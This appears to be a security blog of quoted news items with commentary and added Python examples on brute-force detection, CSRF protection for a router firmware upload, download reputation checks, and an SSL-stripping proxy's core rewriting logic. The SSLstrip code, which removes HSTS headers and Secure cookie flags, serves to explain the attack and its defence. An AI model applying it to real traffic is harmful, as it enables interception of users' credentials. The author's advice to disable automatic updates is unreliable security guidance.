Under a new bill, investigators would be able to hack into computers, install spyware, read emails and destroy files.
They could also break into servers located abroad, if they were being used to block services.
via BBC News – Dutch police may get right to hack in cyber crime fight.
This is no threat to a properly secured system. AV software is not a panacea for securing a system.
Moore’s census involved regularly sending simple, automated messages to each one of the 3.7 billion IP addresses assigned to devices connected to the Internet around the world (Google, in contrast, collects information offered publicly by websites). Many of the two terabytes (2,000 gigabytes) worth of replies Moore received from 310 million IPs indicated that they came from devices vulnerable to well-known flaws, or configured in a way that could let anyone take control of them.
via Pinging the Whole Internet Reveals Unsecured Backdoors That Could Tempt Hackers and Cyber Criminals | MIT Technology Review.
1. Abandon antivirus
Businesses could remove host-based security from their desktops and trust that their perimeter will keep out the malware.
via Time To Dump Antivirus As Endpoint Protection? — Dark Reading.
There are some other useful tips in this article as well. I like the above-quoted idea because AV software can be a pretty heavy load on an endpoint, requiring constant maintenance and upgrades. These upgrade cycles in and of themselves pose a security hazard. The more complex a system becomes, the more that can go wrong.
As I type these words, there is an on-going and highly-distributed, global attack on WordPress installations across virtually every web host in existence. This attack is well organized and again very, very distributed; we have seen over 90,000 IP addresses involved in this attack.
via Global WordPress Brute Force Flood | HostGator Web Hosting Blog | Gator Crossing.
This WordPress blog has been receiving these attacks since around the beginning of the year. Getting rid of the admin account is a first step and using strong passwords is a second; I chose to just shut down access from the Internet entirely by disabling the wp-admin directory and wp-login.php access in httpd.conf. That may not be practical for most sites, however. The error logs were getting quiet in the last 3 or 4 weeks and then this week they’re back up to full speed, blocking IPs from ranges all over the place. It looks like I’m not the only one experiencing this, according to here and here.
Update: From my observations of the logs over these last few months, these bots are hitting the sites very patiently, sometimes once an hour, thus running under the radar of the security plug-ins I tried.
Update II: More links here, here, and from here:
These rules will block access for the offending IP address for 5 minutes upon 10 failed login attempts over a 3 minute duration.
This won’t work. Each IP from these bots may hit you once or twice an hour, so any limit-login plugin won’t see a rate high enough to ban them. You can’t stop this on an IP basis. Since my logs last rotated Sunday morning (almost 6 days ago) I have had 500 different IP addresses hit wp-login.php. They have all been given 403 Forbidden responses, yet they keep coming.
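To make the point above concrete, here is an added example (my own code, not part of the original post and not any of the plug-ins it mentions) that parses Apache combined-format access log lines and applies the quoted "10 failures in 3 minutes" rule two ways: per source IP, as a limit-login plug-in does, and to the wp-login.php endpoint as a whole. The log lines are constructed: 40 bot addresses in the 198.51.100.0/24 test range, each posting twice, one attempt every ten seconds. No single IP ever trips the per-IP rule; the endpoint-wide counter trips within the first two minutes.

```python
"""Distributed wp-login.php brute force: per-IP thresholds vs. an aggregate one.

Added example, not code from the blog or from any limit-login plug-in.
Log lines below are constructed in Apache combined format.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
WINDOW = timedelta(minutes=3)
THRESHOLD = 10          # the "10 failed logins in 3 minutes" rule quoted above


def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    return {"ip": m.group("ip"),
            "ts": datetime.strptime(m.group("ts"), TS_FMT),
            "method": m.group("method"),
            "path": m.group("path"),
            "status": int(m.group("status"))}


def login_attempts(lines):
    """Keep only POSTs to wp-login.php; a GET is just someone loading the form."""
    recs = [parse_line(l) for l in lines]
    return sorted((r for r in recs
                   if r and r["method"] == "POST" and r["path"].startswith("/wp-login.php")),
                  key=lambda r: r["ts"])


def per_ip_bans(attempts, threshold=THRESHOLD, window=WINDOW):
    """Sliding window per source address, the way a limit-login plug-in applies it."""
    recent = defaultdict(list)
    banned = set()
    for r in attempts:
        q = recent[r["ip"]]
        q.append(r["ts"])
        while r["ts"] - q[0] > window:
            q.pop(0)
        if len(q) >= threshold:
            banned.add(r["ip"])
    return banned


def aggregate_alert(attempts, threshold=THRESHOLD, window=WINDOW):
    """The same window applied to the endpoint as a whole, ignoring source IP.
    Returns (fired, number of distinct source IPs)."""
    times, sources, fired = [], set(), False
    for r in attempts:
        sources.add(r["ip"])
        times.append(r["ts"])
        while r["ts"] - times[0] > window:
            times.pop(0)
        if len(times) >= threshold:
            fired = True
    return fired, len(sources)


def sample_log(n_ips=40, per_ip=2, gap_seconds=10):
    """Constructed access log: one attempt every `gap_seconds`, rotating through
    `n_ips` addresses in the 198.51.100.0/24 test range, `per_ip` times each."""
    start = datetime(2013, 4, 13, 3, 0, 0, tzinfo=timezone.utc)
    ips = ["198.51.100.%d" % (i + 1) for i in range(n_ips)]
    lines = ['203.0.113.7 - - [%s] "GET /wp-login.php HTTP/1.1" 200 4127'
             % start.strftime(TS_FMT)]           # an ordinary visitor, not an attempt
    for k in range(n_ips * per_ip):
        ts = start + timedelta(seconds=gap_seconds * (k + 1))
        lines.append('%s - - [%s] "POST /wp-login.php HTTP/1.1" 403 199'
                     % (ips[k % n_ips], ts.strftime(TS_FMT)))
    return lines


if __name__ == "__main__":
    atts = login_attempts(sample_log())
    print("attempts:", len(atts))
    print("per-IP bans:", per_ip_bans(atts))          # empty set
    print("aggregate alert:", aggregate_alert(atts))  # (True, 40)
```

With a single source hammering the form (`sample_log(n_ips=1, per_ip=12)`) the per-IP rule does fire, which is the case those plug-ins were built for. Against the distributed pattern the usable signals are the endpoint-wide rate and the number of distinct addresses, and the practical response is what the post describes: restrict `wp-login.php` to known addresses or disable it from the Internet altogether, for example with a `<Files "wp-login.php">` section in httpd.conf carrying `Require ip` (Apache 2.4) or `Deny from all` plus `Allow from` (Apache 2.2).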
Microsoft announced last night that it has stopped pushing a security update originally released on Patch Tuesday because the fix is causing some PCs to blue screen. Microsoft recommends users uninstall the patch, which is also causing compatibility problems with some endpoint security software.
via Microsoft: Uninstall Faulty Patch Tuesday Security Update | threatpost.
This is why I always turn automatic updates off on all PCs and update on my own terms and on my own schedule.
Today I am publishing 5 Linksys router vulnerabilities so that consumers may be aware of the risks.
via Don’t Use Linksys Routers « Superevr.
I run a WRT54GL in my network but installed Tomato on it because I never liked the Linksys GUI and wanted to try out Tomato. Here’s his take on the WRT54GL:
1. Linksys WRT54GL Firmware Upload CSRF Vulnerability
I demonstrate Cross-Site File Upload in my BlackHat and AppSec USA talks. If you need more info on the vector itself, check out How to upload arbitrary file contents cross-domain by Kotowicz.
I suspect these kinds of exploits exist in all consumer-grade routers.
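What makes a cross-site firmware upload work is that the router's upload handler trusts any POST that arrives with the admin's (browser-cached) credentials. The following is an added example of the server-side checks such a handler needs; it is my own code, not Linksys firmware and not the exploit from the post. The admin-UI origin, the form field names and the per-session token are assumptions, and the requests are constructed with a small helper so the whole thing runs offline.

```python
"""Server-side checks for a router firmware-upload form, so that a page on
another site cannot submit it on behalf of a logged-in admin.

Added example; not Linksys code. ROUTER_ORIGIN, field names, the token
scheme and all requests below are assumptions/constructed."""
import hmac
import re

ROUTER_ORIGIN = "http://192.168.1.1"          # assumed origin of the admin UI


def parse_multipart(body, boundary):
    """Minimal multipart/form-data parser: field name -> (filename, bytes)."""
    parts = {}
    for chunk in body.split(b"--" + boundary)[1:]:
        if chunk.startswith(b"--"):            # closing delimiter
            break
        head, _, data = chunk.partition(b"\r\n\r\n")
        name = re.search(rb'name="([^"]+)"', head)
        if not name:
            continue
        fname = re.search(rb'filename="([^"]*)"', head)
        if data.endswith(b"\r\n"):
            data = data[:-2]
        parts[name.group(1).decode()] = (fname.group(1).decode() if fname else None, data)
    return parts


def authorize_upload(headers, body, session_token):
    """Return ("accept", firmware_bytes) or ("reject", reason)."""
    h = {k.lower(): v for k, v in headers}
    # 1. Same-origin check: Origin if the browser sent one, else Referer;
    #    neither present -> refuse. Older browsers did not send Origin on
    #    form posts, which is why the token in step 2 is the primary control.
    src = h.get("origin") or h.get("referer")
    if not src or not (src == ROUTER_ORIGIN or src.startswith(ROUTER_ORIGIN + "/")):
        return ("reject", "cross-site request")
    m = re.search(r"boundary=([^;]+)", h.get("content-type", ""))
    if not m:
        return ("reject", "not multipart")
    parts = parse_multipart(body, m.group(1).strip().strip('"').encode())
    # 2. Anti-CSRF token bound to the admin session, compared in constant time.
    #    A cross-site page cannot read the token out of the router's own pages.
    token = parts.get("csrf_token", (None, b""))[1]
    if not hmac.compare_digest(token, session_token.encode()):
        return ("reject", "missing or wrong csrf token")
    fw = parts.get("firmware")
    if not fw or not fw[1]:
        return ("reject", "no firmware image")
    return ("accept", fw[1])


def build_request(origin, fields, boundary=b"XcsrfDemoBoundary"):
    """Construct a multipart POST the way a browser would. origin=None omits
    both Origin and Referer. fields: name -> bytes or (filename, bytes)."""
    body = b""
    for name, val in fields.items():
        filename, data = val if isinstance(val, tuple) else (None, val)
        disp = 'form-data; name="%s"' % name
        if filename:
            disp += '; filename="%s"' % filename
        body += (b"--" + boundary + b"\r\nContent-Disposition: " + disp.encode()
                 + b"\r\n\r\n" + data + b"\r\n")
    body += b"--" + boundary + b"--\r\n"
    headers = [("Content-Type", "multipart/form-data; boundary=" + boundary.decode())]
    if origin:
        headers.append(("Origin", origin))
    return headers, body


SESSION_TOKEN = "0f3a9c2b7d1e"                        # constructed per-session token
FIRMWARE = b"\x7fELF-constructed-firmware-image"      # constructed payload

if __name__ == "__main__":
    attack = build_request("http://attacker.example", {"firmware": ("fw.bin", FIRMWARE)})
    legit = build_request(ROUTER_ORIGIN, {"csrf_token": SESSION_TOKEN.encode(),
                                          "firmware": ("fw.bin", FIRMWARE)})
    print(authorize_upload(*attack, SESSION_TOKEN))   # ('reject', 'cross-site request')
    print(authorize_upload(*legit, SESSION_TOKEN))    # ('accept', b'\x7fELF-...')
```

The origin check alone is not enough on the browsers of that era, and the token alone is enough only if the admin UI is not also exposed to reflected content that leaks it; doing both, and failing closed when neither header is present, is the usual answer.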
Unlike Microsoft’s solution, CAMP attempts to detect locally whether any downloaded file is malicious, before passing characteristics of the file to its server-based analysis system. First, the system checks the binary against a blacklist–in this case, Google’s Safe Browsing API. If that check returns no positive result and the file has the potential to be malicious, CAMP will check a whitelist to see if the binary is a known good file.
via Google Uses Reputation To Detect Malicious Downloads – Dark Reading.
CAMP’s 99-percent success rate trounced four antivirus products, which individually only detected at most 25 percent of the malicious files and collectively detected about 40 percent, the researchers stated.
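The ordering described above matters: the local stages are cheap and decide the common case, so only a small fraction of downloads ever produces a feature report. Here is an added example of that pipeline as I would sketch it; it is not Google's code. The blacklist, whitelist, host statistics and verdict policy are all constructed for illustration, and "has the potential to be malicious" is approximated by magic-byte detection of executable formats.

```python
"""Order of checks in a CAMP-style download pre-filter: blacklist, then
"can this file type be malicious at all", then whitelist, and only for what
is left a feature report to a reputation server.

Added example, not Google's code. Lists, host statistics and the verdict
policy are constructed."""
import hashlib
from urllib.parse import urlparse

EXEC_MAGIC = [
    (b"MZ", "pe"),                    # Windows PE
    (b"\x7fELF", "elf"),              # Linux ELF
    (b"\xcf\xfa\xed\xfe", "macho64"),
    (b"#!", "script"),
]


def sha256(data):
    return hashlib.sha256(data).hexdigest()


def file_kind(data):
    """Classify by magic bytes, not by extension or Content-Type,
    both of which the download site controls."""
    for magic, kind in EXEC_MAGIC:
        if data.startswith(magic):
            return kind
    return "other"


def features(data, url):
    """The minimum a reputation service needs; never the file itself."""
    u = urlparse(url)
    return {"sha256": sha256(data), "size": len(data), "kind": file_kind(data),
            "host": u.hostname, "scheme": u.scheme}


# Constructed reputation data: prior downloads seen per host.
HOST_STATS = {
    "downloads.example.org": {"clean": 5000, "bad": 0},
    "cdn.example.net": {"clean": 12, "bad": 3},
}


def reputation_server(feat):
    """Stand-in for the server side (constructed policy): a host with a long
    clean history is trusted, anything else is flagged to the user."""
    stats = HOST_STATS.get(feat["host"])
    if not stats:
        return "warn"
    total = stats["clean"] + stats["bad"]
    if stats["bad"] / total > 0.05 or stats["clean"] < 100:
        return "warn"
    return "allow"


def classify(data, url, blacklist, whitelist, ask_server=reputation_server):
    """Returns (verdict, stage that decided). Local stages run first so the
    common case never leaves the machine."""
    h = sha256(data)
    if h in blacklist:                       # 1. blacklist, whatever the type
        return ("malicious", "blacklist")
    if file_kind(data) == "other":           # 2. not executable -> nothing to do
        return ("allow", "not-executable")
    if h in whitelist:                       # 3. known good binary
        return ("allow", "whitelist")
    return (ask_server(features(data, url)), "reputation")   # 4. ask the server


# Constructed sample files.
KNOWN_BAD = b"MZ\x90\x00constructed-bad-sample"
KNOWN_GOOD = b"\x7fELF\x02\x01\x01constructed-good-tool"
UNKNOWN_PE = b"MZ\x90\x00constructed-unknown-installer"
JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF"

BLACKLIST = {sha256(KNOWN_BAD)}
WHITELIST = {sha256(KNOWN_GOOD)}

if __name__ == "__main__":
    for name, data, url in [
        ("known bad", KNOWN_BAD, "https://downloads.example.org/a.exe"),
        ("jpeg", JPEG, "http://cdn.example.net/pic.jpg"),
        ("known good", KNOWN_GOOD, "http://cdn.example.net/tool"),
        ("unknown, trusted host", UNKNOWN_PE, "https://downloads.example.org/setup.exe"),
        ("unknown, new host", UNKNOWN_PE, "http://new-host.invalid/setup.exe"),
    ]:
        print(name, classify(data, url, BLACKLIST, WHITELIST))
```

Note that the blacklist is consulted before the type test, so a blacklisted file is blocked even if it does not look executable, while an unknown executable from a host with no history is the case that ends up as a warning rather than a hard verdict.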
Description: SSLstrip was released by Moxie to demonstrate the vulnerabilities he spoke about at Black Hat 2009. In this video we will look at how to get started with SSLstrip. We set up 2 VMware machines, one running Windows XP (victim) and the other BackTrack 3 (attacker). Before we actually begin hacking using SSLstrip, we need to set up the entire man-in-the-middle mechanism and packet redirection/forwarding mechanism. We do this by using the following commands in sequence:
via Sslstrip Tutorial.
This tool assumes a man-in-the-middle setup and that HTTP traffic (port 80) gets redirected to a port sslstrip listens on on the attacker’s machine (port 10000 in this video). sslstrip then intercepts HTTPS traffic and returns HTTP traffic to the victim. The victim, thinking his traffic is encrypted, is transmitting in plain text while sslstrip manages the SSL session with the victim’s destination (i.e. the bank). Since this attack uses HTTP, the victim does not need to validate an SSL certificate, so it’s transparent. Detecting this attack is simple because the browser shows http in the displayed URL instead of https, so an alert victim should notice. But not everyone may notice this.
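To show what the proxy actually does to the bytes once it sits in the middle, here is an added example of the rewriting logic; it is my own illustration, not Moxie's sslstrip code, and it opens no sockets. It assumes the MITM and port-80 redirect from the tutorial are already in place, so the victim's plaintext requests reach `handle_client_request()` and the real server's HTTPS responses pass through `strip_response()` on the way back. The bank host and messages are constructed. It also covers the two details that make the attack hold together (the Secure cookie flag and the HSTS header both have to be dropped) and the check that defeats it on a browser that already holds an HSTS entry for the host.

```python
"""Core of an SSL-stripping proxy, as an added illustration of the mechanism.
Not Moxie's sslstrip code; no networking. Hosts and messages are constructed."""
import re

HTTPS_URL = re.compile(r"https://([A-Za-z0-9.-]+)")


def strip_response(headers, body, stripped):
    """Rewrite one upstream response so the victim only ever sees http://.
    `headers` is a list of (name, value); `stripped` collects hosts whose
    links were downgraded, so later requests to them can be upgraded again."""
    def downgrade(m):
        stripped.add(m.group(1))
        return "http://" + m.group(1)

    out = []
    for name, value in headers:
        lname = name.lower()
        if lname == "strict-transport-security":
            continue        # must not reach a browser that has not seen it yet
        if lname == "location":
            value = HTTPS_URL.sub(downgrade, value)
        elif lname == "set-cookie":
            # a Secure cookie is never sent over plain http, so the session
            # would break unless the flag is removed
            value = re.sub(r";\s*Secure\b", "", value, flags=re.I)
        out.append((name, value))
    return out, HTTPS_URL.sub(downgrade, body)


def handle_client_request(request_line, headers, stripped):
    """Decide how the proxy fetches a request the victim sent in plaintext:
    over HTTPS if that host was stripped earlier, otherwise as received."""
    method, path, _ = request_line.split(" ", 2)
    host = dict((k.lower(), v) for k, v in headers)["host"]
    scheme = "https" if host in stripped else "http"
    return "%s %s://%s%s" % (method, scheme, host, path)


def browser_accepts_downgrade(host, hsts_store):
    """A browser holding an HSTS entry for the host rewrites http:// to
    https:// internally and never emits the plaintext request the proxy
    needs, so the attack fails before the first byte is sent."""
    return host not in hsts_store


# Constructed upstream response from the "bank", fetched by the proxy over TLS.
UPSTREAM_HEADERS = [
    ("Location", "https://bank.example/account"),
    ("Set-Cookie", "session=abc123; Path=/; Secure; HttpOnly"),
    ("Strict-Transport-Security", "max-age=31536000"),
    ("Content-Type", "text/html"),
]
UPSTREAM_BODY = ('<a href="https://bank.example/login">Log in</a>'
                 '<img src="http://static.bank.example/logo.png">')


def demo():
    stripped = set()
    headers, body = strip_response(UPSTREAM_HEADERS, UPSTREAM_BODY, stripped)
    # What the victim's browser sends next, and where the proxy fetches it from.
    upstream = handle_client_request("GET /login HTTP/1.1",
                                     [("Host", "bank.example")], stripped)
    return headers, body, sorted(stripped), upstream


if __name__ == "__main__":
    for item in demo():
        print(item)
```

The victim-side symptom is exactly the one the post names: every URL in the address bar reads http, because the proxy has rewritten each https link before the browser saw it. The server-side counter is the header the proxy has to delete, which is why HSTS only protects users who have already visited the site over a clean connection (or whose browser ships a preload entry for it).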
Even the original social networking sites behind OAuth decided they really needed other options for different use-cases, such as Twitter’s xAuth, or Yahoo offering Direct OAuth, which turns the entire scheme into a more complicated version of HTTP Basic Authentication with no added benefits. Perhaps the most damaging point against OAuth is that the original designer behind it decided to remove his name from the specification, and is washing his hands of it.
via Insane Coding: OAuth – A great way to cripple your API.